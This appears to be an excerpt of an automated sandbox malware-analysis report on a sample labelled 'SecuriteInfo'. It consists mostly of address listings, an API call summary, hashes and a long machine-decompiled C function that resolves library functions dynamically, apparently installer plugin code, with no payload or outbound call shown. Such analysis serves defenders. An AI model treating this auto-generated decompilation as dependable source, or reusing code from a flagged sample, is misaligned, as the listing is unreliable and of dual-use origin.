                                                                            0x00404c1d
                                                                            0x00404c1f
                                                                            0x00404c1f
                                                                            0x00404c24
                                                                            0x00404c26
                                                                            0x00404c2e
                                                                            0x00404c35
                                                                            0x00404c37
                                                                            0x00404c42
                                                                            0x00404c42
                                                                            0x00404c37
                                                                            0x00404c52
                                                                            0x00404c5c
                                                                            0x00404c64
                                                                            0x00404c7f
                                                                            0x00404c66
                                                                            0x00404c6f
                                                                            0x00404c6f
                                                                            0x00404c64
                                                                            0x00404c84
                                                                            0x00404c89
                                                                            0x00404c8e
                                                                            0x00404c97
                                                                            0x00404c97
                                                                            0x00404ca0
                                                                            0x00404ca2
                                                                            0x00404ca2
                                                                            0x00404cae
                                                                            0x00404cb6
                                                                            0x00404cc0
                                                                            0x00404cc0
                                                                            0x00404cc5
                                                                            0x00000000
                                                                            0x00404cc5
                                                                            0x00404b6f
                                                                            0x00404b26
                                                                            0x00404b2d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404b2d
                                                                            0x00404a4c
                                                                            0x00404a55
                                                                            0x00404a6f
                                                                            0x00404a74
                                                                            0x00404a7e
                                                                            0x00404a85
                                                                            0x00404a91
                                                                            0x00404a94
                                                                            0x00404a97
                                                                            0x00404a9e
                                                                            0x00404aa6
                                                                            0x00404aa9
                                                                            0x00404aad
                                                                            0x00404ab4
                                                                            0x00404abc
                                                                            0x00404b16
                                                                            0x00404abe
                                                                            0x00404abf
                                                                            0x00404ac6
                                                                            0x00404ad0
                                                                            0x00404ad8
                                                                            0x00404ae5
                                                                            0x00404af9
                                                                            0x00404afd
                                                                            0x00404afd
                                                                            0x00404af9
                                                                            0x00404b02
                                                                            0x00404b0f
                                                                            0x00404b0f
                                                                            0x00404abc
                                                                            0x00000000
                                                                            0x00404a74
                                                                            0x00404a62
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404a68
                                                                            0x00000000
                                                                            0x004049d3
                                                                            0x004049e0
                                                                            0x004049e9
                                                                            0x004049f6
                                                                            0x004049f6
                                                                            0x004049fd
                                                                            0x00404a03
                                                                            0x00404a0c
                                                                            0x00404a0f
                                                                            0x00404a12
                                                                            0x00404a1a
                                                                            0x00404a1d
                                                                            0x00404a20
                                                                            0x00404a26
                                                                            0x00404a2d
                                                                            0x00404a34
                                                                            0x00404ccb
                                                                            0x00404cdd
                                                                            0x00404a3a
                                                                            0x00404a3d
                                                                            0x00000000
                                                                            0x00404a3d
                                                                            0x00404a34

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                                            • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
                                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404AFD
                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F
                                                                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                              • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                                                                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                            • API String ID: 2624150263-3142480687
                                                                            • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                                            • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 713C1BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 95%
                                                                            			E713C1BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E713C12BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E713C12BB();
				_t321 = E713C12E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E713C13B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E713C162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x713c23e8) & 0x000000ff) * 4 +  &M713C235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E713C12CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E713C12BB();
											 &_v12 = E713C1B86( &_v12);
											__eax = E713C1510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E713C1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E713C1B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x713c405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E713C1B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E713C16BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E713C13B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E713C16BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E713C13B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E713C13B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E713C13B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E713C12CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E713C13B1(_t90) * 4);
					goto L165;
				}
			}

































































                                                                            0x713c1c07
                                                                            0x713c1c0a
                                                                            0x713c1c0d
                                                                            0x713c1c10
                                                                            0x713c1c13
                                                                            0x713c1c16
                                                                            0x713c1c19
                                                                            0x713c1c1b
                                                                            0x713c1c1e
                                                                            0x713c1c21
                                                                            0x713c1c26
                                                                            0x713c1c29
                                                                            0x713c1c31
                                                                            0x713c1c39
                                                                            0x713c1c3b
                                                                            0x713c1c3e
                                                                            0x713c1c46
                                                                            0x713c1c46
                                                                            0x713c1c4b
                                                                            0x713c1c4e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1c5b
                                                                            0x713c1c60
                                                                            0x713c1c62
                                                                            0x713c1cf4
                                                                            0x713c1cf4
                                                                            0x713c1cf4
                                                                            0x713c1cf8
                                                                            0x713c1cfb
                                                                            0x713c1cfd
                                                                            0x713c1d1f
                                                                            0x713c1d21
                                                                            0x713c1d24
                                                                            0x713c1d33
                                                                            0x713c1d35
                                                                            0x713c1d3b
                                                                            0x713c1d3b
                                                                            0x713c1d41
                                                                            0x713c1d44
                                                                            0x713c1d44
                                                                            0x713c1d47
                                                                            0x713c1d47
                                                                            0x713c1d4d
                                                                            0x713c1d4f
                                                                            0x713c1d4f
                                                                            0x713c1d51
                                                                            0x713c1d54
                                                                            0x713c1d57
                                                                            0x713c1d5d
                                                                            0x713c1d63
                                                                            0x713c1d66
                                                                            0x713c1d8a
                                                                            0x713c1d8d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1d90
                                                                            0x713c1d92
                                                                            0x713c1da0
                                                                            0x713c1da3
                                                                            0x713c1da5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1da7
                                                                            0x713c1da7
                                                                            0x713c1da7
                                                                            0x713c1dad
                                                                            0x713c1daf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1db1
                                                                            0x713c1db3
                                                                            0x713c1db5
                                                                            0x713c1db7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1db7
                                                                            0x713c1db9
                                                                            0x713c1dbb
                                                                            0x713c1dbd
                                                                            0x713c1dbd
                                                                            0x713c1dc3
                                                                            0x713c1dc9
                                                                            0x713c1dcb
                                                                            0x713c1ddf
                                                                            0x713c1ddf
                                                                            0x713c1de1
                                                                            0x713c1dcd
                                                                            0x713c1dd3
                                                                            0x713c1dd6
                                                                            0x713c1dd6
                                                                            0x00000000
                                                                            0x713c1d68
                                                                            0x713c1d68
                                                                            0x713c1d68
                                                                            0x713c1d69
                                                                            0x713c1d71
                                                                            0x713c1d75
                                                                            0x713c1d7b
                                                                            0x713c1d7f
                                                                            0x00000000
                                                                            0x713c1d7f
                                                                            0x713c1d6b
                                                                            0x713c1d6b
                                                                            0x713c1d6c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1d6e
                                                                            0x713c1d6f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c1d6f
                                                                            0x713c1cff
                                                                            0x713c1d00
                                                                            0x713c1d09
                                                                            0x713c1d0c
                                                                            0x713c1d19
                                                                            0x713c1d19
                                                                            0x713c1d0e
                                                                            0x713c1d0e
                                                                            0x713c1de7
                                                                            0x713c1dea
                                                                            0x713c1dee
                                                                            0x713c1e61
                                                                            0x713c1e65
                                                                            0x713c1c43
                                                                            0x00000000
                                                                            0x713c1c43
                                                                            0x00000000
                                                                            0x713c1e65
                                                                            0x713c1cfd
                                                                            0x713c1c68
                                                                            0x713c1c6b
                                                                            0x713c1cce
                                                                            0x713c1cd1
                                                                            0x713c1ce3
                                                                            0x713c1ce3
                                                                            0x713c1ce6
                                                                            0x713c1df3
                                                                            0x713c1df6
                                                                            0x713c1df6
                                                                            0x713c1df8
                                                                            0x713c21ae
                                                                            0x713c21c6
                                                                            0x713c21c6
                                                                            0x713c21c9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x713c21b3
                                                                            0x713c21b4
                                                                            0x713c21b7
                                                                            0x713c21ba
                                                                            0x713c2244
                                                                            0x713c224b
                                                                            0x713c2251
                                                                            0x713c2255
                                                                            0x713c1e5c
                                                                            0x713c1e5d
                                                                            0x713c1e5d
                                                                            0x713c1e5e
                                                                            0x00000000
                                                                            0x713c1e5e
                                                                            0x713c21c0
                                                                            0x713c21c3
                                                                            0x713c21c3
                                                                            0x713c21cb
                                                                            0x713c21ce
                                                                            0x713c2238
                                                                            0x713c1e51
                                                                            0x713c1e54
                                                                            0x713c1e57
                                                                            0x713c1e5a
                                                                            0x713c1e5a
                                                                            0x00000000
                                                                            0x713c1e5a
